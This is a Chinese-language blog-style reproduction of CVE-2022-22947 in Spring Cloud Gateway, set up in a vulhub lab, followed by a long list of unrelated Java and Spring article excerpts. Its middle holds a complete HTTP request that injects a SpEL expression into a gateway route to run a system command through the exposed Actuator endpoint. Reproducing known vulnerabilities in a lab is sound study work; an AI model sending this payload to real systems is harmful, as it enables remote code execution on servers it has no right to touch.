Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947)

漏洞描述

使用Spring Cloud Gateway的应用程序在Actuator端点启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可以恶意创建允许在远程主机上执行任意远程执行的请求。

当攻击者可以访问actuator API时，就可以利用该漏洞执行任意命令。

影响范围

Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway 其他已不再更新的版本

环境搭建

漏洞环境搭建，采用vulhub，搭建方法，自行搜索。

搭建成功后，访问一下

漏洞复现

1.查看actuator端点是开启的

抓包，并修改接口为/actuator

2. 查看/actuator/gateway/routes

返回的路由信息，意思是当访问index时，路由到http://example.com:80

3.创建路由

POST /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.10.171:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
If-None-Match: "3147526947"
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 431

{
    "id": "test",
    "filters": [
        {
            "name": "AddResponseHeader",
            "args": {
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
                "name": "cmd"
            }
        }
    ],
    "uri": "http://example.com:80",
    "order": 0
}

4.刷新路由

5.访问创建的路由

6.删除路由

7.再次刷新路由

8.然后，访问该路由，发现路由已被删除

到此这篇关于Spring Cloud Gateway远程命令执行漏洞（CVE-2022-22947）的文章就介绍到这了,更多相关Spring Cloud Gateway远程命令执行漏洞内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家！

你可能感兴趣的:(Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947))

云存储技术的神器--rclone llody_55 经验分享 linux python centos 运维 mysql ossinsight
原文地址：云存储技术的神器--rclone云存储技术的神器--rclone今天我们要推荐一款运维必备工具--rclone。官网地址：Rclone中文网：rclone中文站-专为国人汉化，解决数据同步/数据备份/数据迁移需求Rclone是什么？Rclone，即"rsyncforcloudstorage"，是一款专业的用于管理和同步云储存数据的开源命令行工具。通过该工具，用户不仅可以在各类型云盘之间拷
Spring 多实例注入 m0_74825172 面试学习路线阿里巴巴 spring java 后端
文章目录1.Spring多实例注入的应用场景2.Spring多实例注入的使用2.1通过ApplicationContext获取多实例2.2配置@Scope的proxyMode属性获取多实例1.Spring多实例注入的应用场景Spring容器中保存的bean默认是单例的，通常来说这样做可以降低bean对象创建的频率，在某些访问量大的场景下可以节省对象创建消耗的时间，提高响应性能。但在一些其他场景，比
使用Java对接StockTV印度股票数据源API实战指南 java爬虫
关键词：JavaAPI开发、SpringBoot、WebSocket、ApacheHttpClient一、项目概述本指南将使用Java实现StockTV金融数据API的完整对接方案，包含以下核心模块：✅RESTAPI客户端：支持同步/异步调用✅WebSocket实时订阅：基于SpringWebSocket✅企业级特性：连接池管理、熔断降级✅生产就绪：完整的异常处理和监控二、环境准备1.技术栈要求J
SpringBoot + vue 管理系统 m0_51274464 面试学习路线阿里巴巴 spring boot vue.js 后端
SpringBoot+vue管理系统文章目录SpringBoot+vue管理系统1、成品效果展示2、项目准备3、项目开发3.1、部门管理3.1.1、前端核心代码3.1.2、后端代码实现3.2、员工管理3.2.1、前端核心代码3.2.2、后端代码实现3.3、班级管理3.3.1、前端核心代码3.3.2、后端代码实现3.4、学生管理3.4.1、前端核心代码3.4.2、后端代码实现3.5、数据统计3.5.
SpringBoot3配置全局异常类库尔班Java之路 spring boot spring
导入相关包：@Slf4j：Lombok提供的注解，用于自动生成日志记录器。@ControllerAdvice：Spring框架提供的注解，用于定义全局异常处理类。@ExceptionHandler：Spring框架提供的注解，用于处理特定类型的异常。@ResponseBody：Spring框架提供的注解，表示返回结果直接写入HTTP响应体。使用@Slf4j注解：@Slf4j注解会自动生成一个名为l
基于Java+Springboot+Vue开发的口腔牙科诊所预约系统源码+课程设计+代码说明西门吹雪1998 java毕业设计 java课程设计 java spring boot vue.js
项目简介该项目是基于Java+Springboot+Vue开发的口腔牙科诊所预约管理系统（前后端分离），这是一项为大学生课程设计作业而开发的项目。该系统旨在帮助大学生学习并掌握Java编程技能，同时锻炼他们的项目设计与开发能力。通过学习基于Java的口腔预约管理系统项目，大学生可以在实践中学习和提升自己的能力，为以后的职业发展打下坚实基础。技术学习之路在线演示演示地址：https://teeth.
Spring Boot3项目的常见通用整体架构-全局异常类 ahauedu 项目实战与案例分析 spring boot 架构后端
本文的核心重点就是讲解SpringBoot3分层架构中全局异常处理类的设计。前文回顾：上文中我们已经实现了SpringBoot项目的分层架构SpringBoot3项目的常见通用整体架构架构设计需要考虑诸多因素，合理的架构设计可以帮助项目的可维护性、扩展性和可测试性。以下是一些常见的最佳实践和设计建议，适合中大型项目或者复杂的SpringBoot3项目一、分层架构设计典型的分层架构可以帮助将关注点分
Spring Cloud之远程调用OpenFeign参数传递新绿MEHO Spring Cloud JAVA Java spring cloud
目录OpenFeign参数传递传递单个参数传递多个参数传递对象传递JSONOpenFeign参数传递传递单个参数服务提供方product-service@RequestMapping("/product")@RestControllerpublicclassProductController{@AutowiredprivateProductServiceproductService;@Reques
Spring Cloud Alibaba微服务架构实战教程—17分布式缓存下Redis设计江湖一点雨最新SpringCloud Alibaba实战开发 redis缓存设计 springcloud 微服务实战 spring cloud alibaba java开发实战
前言大多数的文章，开头就是告诉你使用redis做缓存，怎么怎么样，而本系列，不打算采用这样无趣的写法，这和直接搬运有什么区别？笔者力求读者能得到更大程度的系统学习，会从为什么使用缓存来给大家进行学习。问问大家，当系统的执行速度慢怎么办？对于更新速度不是很快的站点，可以采用静态化来避免过多的数据查询。通常前端使用Freemaker或Velocity、thymeleaf等模板引擎来实现页面的静态化。对
Infor CloudSuite软件二次开发：InforCloudSuite移动应用开发 kkchenjj 工业软件二次开发全集架构工业软件 ERP 开发语言
InforCloudSuite软件二次开发：InforCloudSuite移动应用开发InforCloudSuite简介InforCloudSuite平台概述InforCloudSuite是一个集成的企业资源规划(ERP)解决方案，专为特定行业设计，提供了一系列的云应用，旨在优化业务流程，提升运营效率。该平台涵盖了供应链管理、财务、人力资源、客户关系管理等多个领域，通过其先进的功能和模块，企业可以
java--数据校验Validator 郑*杰 java 开发语言 spring
一、基于注解进行数据校验1、配置依赖java--常用依赖配置_郑*杰的博客-CSDN博客2、创建一个配置类packagecom.ruqi.aditainoal;importorg.springframework.context.annotation.Bean;importorg.springframework.context.annotation.ComponentScan;importorg.s
使用 ResponseBodyEmitter 实现异步响应式数据流处理随风九天 spring java 多线程 BodyEmitter 异步响应
1.概述1.1什么是ResponseBodyEmitterResponseBodyEmitter是SpringMVC提供的一个接口，用于支持异步返回响应数据流。它允许在控制器方法中逐步发送数据给客户端，而无需一次性生成完整的响应。1.2使用场景实时数据推送（如股票行情、聊天消息等）。大量数据分批传输。服务器发送事件（SSE,Server-SentEvents）。1.3优势与局限性优势：支持异步数据
Java基于redis实现进度条冰糖码奇朵 java redis
一.问题背景为了提升用户体验，开发中有很多场景需要用到进度条，比如导入、导出、大规模更新操作等。进度条在许多大型系统中使用频率较高，反复编写既麻烦又不利于维护，因此基于Redis抽成公共方法供不同功能调用。二.实现方案1.引入依赖如果系统已集成Redis，直接跳到第5步，进度条实现。org.springframework.bootspring-boot-starter-data-redis2.配置
【Spring】Spring boot 的 AutoConfigurationImportSelector 自动配置原理九师兄 boot spring boot java 数据库
1.美图2.概述SpringBoot启动的时候加载主配置类,开启了自动配置功能@EnableAutoConfiguration参考：Spring:@EnableAutoConfiguration注解@EnableAutoConfiguration是SpringBoot框架中的一个核心注解，它的作用是自动配置SpringBoot应用程序的各种组件、功能和模块。该注解的原理主要涉及以下几个方面：1.1
（9）异步Mongo驱动的性能测试——响应式Spring的道法术器享学IT 【道法术器】响应式Spring 响应式异步 Mongo 性能
本系列其他文章见：《响应式Spring的道法术器》。前情提要：SpringWebFlux快速上手|SpringWebFlux性能测试|SpringWebClient性能测试1.4.4同步与异步数据库驱动的性能对比许多数据库已陆续推出官方的异步驱动，在SpringDataReactive中，已经集成了Mongo、Casandra、Redis、CouchDB的异步驱动。在SpringWebFlux中使
Spring Boot中@Valid 与 @Validated 注解的详解 longdong7889 spring boot java 后端
SpringBoot中@Valid与@Validated注解的详解引言在SpringBoot应用中，参数校验是确保数据完整性和一致性的重要手段。@Valid和@Validated注解是SpringBoot中用于参数校验的两个核心注解。本文将详细介绍这两个注解的用法、区别以及代码样例。@Valid注解功能介绍@Valid是JavaEE提供的标准注解，它是JSR303规范的一部分，主要用于Hibern
GEE APP——SnowCloudMetrics应用程序，用于分析和可视化雪的覆盖频率（SCF）和雪的消失日期（SDD）此星光明 GEE APP SCF SDD APP 应用雪 gee 交互式界面
目录简介代码解释代码结果网址简介GEEAPP——SnowCloudMetrics应用程序，用于分析和可视化雪的覆盖频率（SCF）和雪的消失日期（SDD）代码解释用于GoogleEarthEngine(GEE)的应用程序，名为"SnowCloudMetrics"，主要用于分析和可视化雪的覆盖频率（SCF）和雪的消失日期（SDD）。以下是其主要功能和结构的具体解释：###主要功能1.**数据导入**：
Spring Boot 陈辰学长 spring boot java spring
SpringBoot作为一个基于SpringFramework的快速开发框架，广泛应用于现代微服务架构中。在SpringBoot应用中，循环依赖（CircularDependency）是一个常见的问题，它指的是两个或多个bean相互依赖，形成一个闭环。Spring框架在默认情况下能够处理单例（Singleton）作用域下的构造器注入（ConstructorInjection）之外的循环依赖，这主要
slf4j导入那个依赖_复杂Spring项目中SLF4J最佳使用姿势 weixin_39955421 slf4j导入那个依赖
一、Java日志体系概述图1-1Java日志体系概况图1-1展示了Java日志体系的三个主要部分：日志门面接口(SLF4J、JCL)一系列绑定和桥接具体的日志实现先来两个例子：Spring项目中通过CommonsLogging直接使用log4j图1-2通过CommonsLogging使用log4j本例中由于spring-core中原生依赖commons-logging，所以只需要添加log4j和l
深入理解Java中的@Async异步功能程序员总部 java java 开发语言
在Java开发中，处理异步任务是一个很重要的环节，特别是当你希望提高应用程序的响应速度时。Spring框架提供了一个非常方便的注解——@Async，使得异步编程变得简单而高效。接下来我们就来聊聊@Async的工作原理、使用方法以及一些实际应用场景。什么是@Async？@Async是Spring框架中的一个注解，用于实现异步方法的调用。当一个方法被标记为@Async时，Spring会在后台线程中执行
【人工智能】农业工程与信息技术文献推荐 lisw05 人工智能农业信息技术机器人
李升伟整理1.农业物联网与智能化管理《农业物联网导论》作者：李道亮内容简介：本书系统介绍了农业物联网的基本概念、技术架构及其在农业生产中的应用，包括传感器网络、远程监控、智能决策支持系统等。《农业信息智能获取技术》作者：岳峻、傅泽田、高文内容简介：重点探讨了如何利用信息技术获取农业数据，包括遥感技术、无人机监测和传感器网络的应用。2.农业大数据与决策支持《农业大数据：理论与实践》作者：梅方权内容简
SpringBoot整合MyBatis-Plus全攻略：从零实现高效CRUD rider189 java spring boot mybatis
一、MyBatis-Plus核心优势MyBatis-Plus作为MyBatis的增强工具包，在保留原生特性的基础上，提供了多项开箱即用的功能：自动生成基础CRUD操作内置代码生成器（3.5.3+版本支持最新模板引擎）强大的条件构造器Wrapper支持Lambda形式调用主键自动生成策略（支持雪花算法、UUID等）二、环境搭建与配置1.创建SpringBoot项目使用SpringInitializr
windows11家庭版安装ubuntu子系统训练深度模型吃水果不削皮 ubuntu linux windows
文章目录环境准备前提条件安装环境安装Hyper-V安装Linux分发版升级WSL内核启用虚拟机功能安装ubuntu24.04安装桌面环境安装远程控制软件xrdp从Windows启动桌面版Ubuntu环境准备前提条件windows机器需要支持虚拟化，并且需要在BIOS中开启虚拟化技术，因为WSL2基于hyper-V，查看是否开启虚拟化：按住Windows+R输入cmd打开命令行，输入systemin
基于SpringBoot的智能问诊系统设计与隐私保护策略大熊计算机技术博文 spring boot 后端 java
通过SpringBoot框架，我们可以快速搭建一个智能问诊系统，为用户提供便捷的线上医疗服务。然而，在系统设计和实现过程中，如何保障用户的隐私和数据安全，始终是一个亟需关注的问题。本文将探讨基于SpringBoot的智能问诊系统的设计原理、开发实践及隐私保护策略。1.智能问诊系统概述智能问诊系统是基于人工智能、数据分析及信息技术等手段，通过网络平台为用户提供医疗咨询、初步诊断、健康管理等服务的系统
spring AOP详解 web15085415935 面试学习路线阿里巴巴 spring java 后端
文章目录AOP1环境准备1.1工程及接口创建1.2工程存在的问题1.2.1问题1.2.2解决思路2AOP面向切面编程2.1AOP概述2.2AOP原理分析3基于注解的AOP3.1入门示例3.2使用流程3.3切入点表达式3.4练习3.5通知类型AOPAOP（AspectOrientProgramming）是一种设计思想，是软件设计领域中的面向切面编程，它是面向对象编程(OOP)的一种补充和完善；实际项
SpringBoot启动类 NoBarLing SpringBoot springboot
SpringBoot启动类importlombok.extern.slf4j.Slf4j;importorg.springframework.boot.SpringApplication;importorg.springframework.boot.autoconfigure.SpringBootApplication;importorg.springframework.context.Confi
Spring Boot 自动装配原理详解 sevevty-seven spring boot 后端 java
SpringBoot自动装配原理详解SpringBoot的自动装配（Auto-Configuration）是其核心特性之一，它极大地简化了开发者在搭建应用时的配置工作。通过引入特定的依赖（如spring-boot-starter-web），SpringBoot能够自动配置嵌入式服务器、数据库连接等功能，而无需手动编写繁琐的配置代码。本文将深入剖析SpringBoot自动装配的原理，结合源码和详细注
GaussianEditor: Swift and Controllable 3D Editing with Gaussian Splatting 于初见月 paper 计算机视觉
Abstract3Deditingplaysacrucialroleinmanyareassuchasgamingandvirtualreality.Traditional3Deditingmethods,whichrelyonrepresentationslikemeshesandpointclouds,oftenfallshortinrealisticallydepictingcomplexs
layui向body添加html_使用LayUI展示数据 weixin_39672296
LayUI是一款免费，开源，轻量级的前端cms框架，适用于企业后端,能快速上手开发，集成了常用的组件，还有完善的文档和社区。使用：1.把这个5个文件项都拷贝到项目中2.到layui官网地址将后台布局的代码考过来，做一个左侧导航，右侧显示主内容的格局3.代码复制到我们自己项目新建的home.html页面后,根据代码上的提示，将远程地址替换成本地，直接删除css引用和js引用，从自己的项目中将这2个文
Java直通车系列24【Spring Boot】（项目创建）浪九天 Java直通车 spring boot spring 开发语言 java
目录使用SpringInitializr创建项目1.概念2.详细步骤步骤1：访问SpringInitializr网站步骤2：配置项目元数据步骤3：添加依赖步骤4：生成项目3.场景示例使用IDE插件创建项目1.概念2.详细步骤（以IntelliJIDEA为例）步骤1：打开IntelliJIDEA步骤2：选择项目类型步骤3：配置项目元数据步骤4：添加依赖步骤5：完成项目创建3.场景示例手动创建项目1.
Java开发中，spring mvc 的线程怎么调用？小麦麦子 spring mvc
今天逛知乎，看到最近很多人都在问spring mvc 的线程http://www.maiziedu.com/course/java/ 的启动问题，觉得挺有意思的，那哥们儿问的也听仔细，下面的回答也很详尽，分享出来，希望遇对遇到类似问题的Java开发程序猿有所帮助。问题：在用spring mvc架构的网站上，设一线程在虚拟机启动时运行，线程里有一全局
maven依赖范围 bitcarter maven
1.test 测试的时候才会依赖，编译和打包不依赖，如junit不被打包 2.compile 只有编译和打包时才会依赖 3.provided 编译和测试的时候依赖，打包不依赖，如：tomcat的一些公用jar包 4.runtime 运行时依赖，编译不依赖 5.默认compile 依赖范围compile是支持传递的，test不支持传递 1.传递的意思是项目A，引用
Jaxb org.xml.sax.saxparseexception : premature end of file darrenzhu xml premature JAXB
如果在使用JAXB把xml文件unmarshal成vo(XSD自动生成的vo)时碰到如下错误： org.xml.sax.saxparseexception : premature end of file 很有可能时你直接读取文件为inputstream，然后将inputstream作为构建unmarshal需要的source参数。InputSource inputSource = new In
CSS Specificity 周凡杨 html 权重 Specificity css
有时候对于页面元素设置了样式，可为什么页面的显示没有匹配上呢？ because specificity CSS 的选择符是有权重的，当不同的选择符的样式设置有冲突时，浏览器会采用权重高的选择符设置的样式。规则： HTML标签的权重是1 Class 的权重是10 Id 的权重是100
java与servlet g21121 servlet
servlet 搞java web开发的人一定不会陌生，而且大家还会时常用到它。下面是java官方网站上对servlet的介绍： java官网对于servlet的解释写道 Java Servlet Technology Overview Servlets are the Java platform technology of choice for extending and enha
eclipse中安装maven插件 510888780 eclipse maven
1.首先去官网下载 Maven： http://www.apache.org/dyn/closer.cgi/maven/binaries/apache-maven-3.2.3-bin.tar.gz 下载完成之后将其解压，我将解压后的文件夹：apache-maven-3.2.3，并将它放在 D:\tools目录下，即 maven 最终的路径是：D:\tools\apache-mave
jpa@OneToOne关联关系布衣凌宇 jpa
Nruser里的pruserid关联到Pruser的主键id，实现对一个表的增删改，另一个表的数据随之增删改。 Nruser实体类 //***************************************************************** @Entity @Table(name="nruser") @DynamicInsert @Dynam
我的spring学习笔记11-Spring中关于声明式事务的配置 aijuans spring 事务配置
这两天学到事务管理这一块，结合到之前的terasoluna框架，觉得书本上讲的还是简单阿。我就把我从书本上学到的再结合实际的项目以及网上看到的一些内容，对声明式事务管理做个整理吧。我看得Spring in Action第二版中只提到了用TransactionProxyFactoryBean和<tx:advice/>,定义注释驱动这三种，我承认后两种的内容很好，很强大。但是实际的项目当中
java 动态代理简单实现 antlove java handler proxy dynamic service
dynamicproxy.service.HelloService package dynamicproxy.service; public interface HelloService { public void sayHello(); } dynamicproxy.service.impl.HelloServiceImpl package dynamicp
JDBC连接数据库百合不是茶 JDBC编程 JAVA操作oracle数据库
如果我们要想连接oracle公司的数据库，就要首先下载oralce公司的驱动程序，将这个驱动程序的jar包导入到我们工程中; JDBC链接数据库的代码和固定写法; 1,加载oracle数据库的驱动; &nb
单例模式中的多线程分析 bijian1013 java thread 多线程 java多线程
谈到单例模式，我们立马会想到饿汉式和懒汉式加载，所谓饿汉式就是在创建类时就创建好了实例，懒汉式在获取实例时才去创建实例，即延迟加载。饿汉式： package com.bijian.study; public class Singleton { private Singleton() { } // 注意这是private 只供内部调用 private static
javascript读取和修改原型特别需要注意原型的读写不具有对等性 bijian1013 JavaScript prototype
对于从原型对象继承而来的成员，其读和写具有内在的不对等性。比如有一个对象A，假设它的原型对象是B，B的原型对象是null。如果我们需要读取A对象的name属性值，那么JS会优先在A中查找，如果找到了name属性那么就返回；如果A中没有name属性，那么就到原型B中查找name，如果找到了就返回；如果原型B中也没有
【持久化框架MyBatis3六】MyBatis3集成第三方DataSource bit1129 dataSource
MyBatis内置了数据源的支持，如： <environments default="development"> <environment id="development"> <transactionManager type="JDBC" /> <data
我程序中用到的urldecode和base64decode,MD5 bitcarter c MD5 base64decode urldecode
这里是base64decode和urldecode，Md5在附件中。因为我是在后台所以需要解码： string Base64Decode(const char* Data,int DataByte,int& OutByte) { //解码表 const char DecodeTable[] = { 0, 0, 0, 0, 0, 0
腾讯资深运维专家周小军：QQ与微信架构的惊天秘密 ronin47
社交领域一直是互联网创业的大热门，从PC到移动端，从OICQ、MSN到QQ。到了移动互联网时代，社交领域应用开始彻底爆发，直奔黄金期。腾讯在过去几年里，社交平台更是火到爆，QQ和微信坐拥几亿的粉丝，QQ空间和朋友圈各种刷屏，写心得，晒照片，秀视频，那么谁来为企鹅保驾护航呢？支撑QQ和微信海量数据背后的架构又有哪些惊天内幕呢？本期大讲堂的内容来自今年2月份ChinaUnix对腾讯社交网络运营服务中心
java-69-旋转数组的最小元素。把一个数组最开始的若干个元素搬到数组的末尾，我们称之为数组的旋转。输入一个排好序的数组的一个旋转，输出旋转数组的最小元素 bylijinnan java
public class MinOfShiftedArray { /** * Q69 旋转数组的最小元素 * 把一个数组最开始的若干个元素搬到数组的末尾，我们称之为数组的旋转。输入一个排好序的数组的一个旋转，输出旋转数组的最小元素。 * 例如数组{3, 4, 5, 1, 2}为{1, 2, 3, 4, 5}的一个旋转，该数组的最小值为1。 */ publ
看博客，应该是有方向的 Cb123456 反省看博客
看博客，应该是有方向的: 我现在就复习以前的，在补补以前不会的，现在还不会的，同时完善完善项目，也看看别人的博客. 我刚突然想到的: 1.应该看计算机组成原理，数据结构，一些算法，还有关于android,java的。 2.对于我，也快大四了，看一些职业规划的，以及一些学习的经验，看看别人的工作总结的. 为什么要写
[开源与商业]做开源项目的人生活上一定要朴素,尽量减少对官方和商业体系的依赖 comsci 开源项目
为什么这样说呢？因为科学和技术的发展有时候需要一个平缓和长期的积累过程，但是行政和商业体系本身充满各种不稳定性和不确定性，如果你希望长期从事某个科研项目，但是却又必须依赖于某种行政和商业体系，那其中的过程必定充满各种风险。。。所以，为避免这种不确定性风险，我
一个 sql优化（[精华] 一个查询优化的分析调整全过程！很值得一看） cwqcwqmax9 sql
见 http://www.itpub.net/forum.php?mod=viewthread&tid=239011 Web翻页优化实例提交时间: 2004-6-18 15:37:49 回复发消息环境： Linux ve
Hibernat and Ibatis dashuaifu Hibernate ibatis
Hibernate VS iBATIS 简介 Hibernate 是当前最流行的O/R mapping框架，当前版本是3.05。它出身于sf.net，现在已经成为Jboss的一部分了 iBATIS 是另外一种优秀的O/R mapping框架，当前版本是2.0。目前属于apache的一个子项目了。相对Hibernate“O/R”而言，iBATIS 是一种“Sql Mappi
备份MYSQL脚本 dcj3sjt126com mysql
#!/bin/sh # this shell to backup mysql #[email protected] (QQ:1413161683 DuChengJiu) _dbDir=/var/lib/mysql/ _today=`date +%w` _bakDir=/usr/backup/$_today [ ! -d $_bakDir ] && mkdir -p
iOS第三方开源库的吐槽和备忘 dcj3sjt126com ios
转自 ibireme的博客做iOS开发总会接触到一些第三方库，这里整理一下，做一些吐槽。目前比较活跃的社区仍旧是Github，除此以外也有一些不错的库散落在Google Code、SourceForge等地方。由于Github社区太过主流，这里主要介绍一下Github里面流行的iOS库。首先整理了一份 Github上排名靠
html wlwmanifest.xml eoems html xml
所谓优化wp_head()就是把从wp_head中移除不需要元素，同时也可以加快速度。步骤：加入到function.php remove_action('wp_head', 'wp_generator'); //wp-generator移除wordpress的版本号，本身blog的版本号没什么意义，但是如果让恶意玩家看到，可能会用官网公布的漏洞攻击blog remov
浅谈Java定时器发展 hacksin java 并发 timer 定时器
java在jdk1.3中推出了定时器类Timer,而后在jdk1.5后由Dou Lea从新开发出了支持多线程的ScheduleThreadPoolExecutor，从后者的表现来看，可以考虑完全替代Timer了。 Timer与ScheduleThreadPoolExecutor对比： 1. Timer始于jdk1.3,其原理是利用一个TimerTask数组当作队列
移动端页面侧边导航滑入效果 ini jquery Web html5 css javascirpt
效果体验：http://hovertree.com/texiao/mobile/2.htm可以使用移动设备浏览器查看效果。效果使用到jquery-2.1.4.min.js，该版本的jQuery库是用于支持HTML5的浏览器上，不再兼容IE8以前的浏览器，现在移动端浏览器一般都支持HTML5，所以使用该jQuery没问题。HTML文件代码： <!DOCTYPE html> <h
AspectJ+Javasist记录日志 kane_xie aspectj javasist
在项目中碰到这样一个需求，对一个服务类的每一个方法，在方法开始和结束的时候分别记录一条日志，内容包括方法名，参数名+参数值以及方法执行的时间。 @Override public String get(String key) { // long start = System.currentTimeMillis(); // System.out.println("Be
redis学习笔记 MJC410621 redis NoSQL
1)nosql数据库主要由以下特点：非关系型的、分布式的、开源的、水平可扩展的。 1，处理超大量的数据 2，运行在便宜的PC服务器集群上， 3，击碎了性能瓶颈。 1)对数据高并发读写。 2)对海量数据的高效率存储和访问。 3)对数据的高扩展性和高可用性。 redis支持的类型： Sring 类型 set name lijie get name lijie set na
使用redis实现分布式锁 qifeifei
在多节点的系统中，如何实现分布式锁机制，其中用redis来实现是很好的方法之一，我们先来看一下jedis包中，有个类名BinaryJedis,它有个方法如下： public Long setnx(final byte[] key, final byte[] value) { checkIsInMulti(); client.setnx(key, value); ret
BI并非万能，中层业务管理报表要另辟蹊径张老师的菜大数据 BI 商业智能信息化
BI是商业智能的缩写，是可以帮助企业做出明智的业务经营决策的工具，其数据来源于各个业务系统，如ERP、CRM、SCM、进销存、HER、OA等。 BI系统不同于传统的管理信息系统，他号称是一个整体应用的解决方案，是融入管理思想的强大系统：有着系统整体的设计思想，支持对所有
安装rvm后出现rvm not a function 或者ruby -v后提示没安装ruby的问题 wudixiaotie function
1.在~/.bashrc最后加入 [[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" 2.重新启动terminal输入： rvm use ruby-2.2.1 --default 把当前安装的ruby版本设为默

按字母分类： A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 其他

Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947)

目录

漏洞描述

环境搭建

漏洞复现

你可能感兴趣的:(Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947))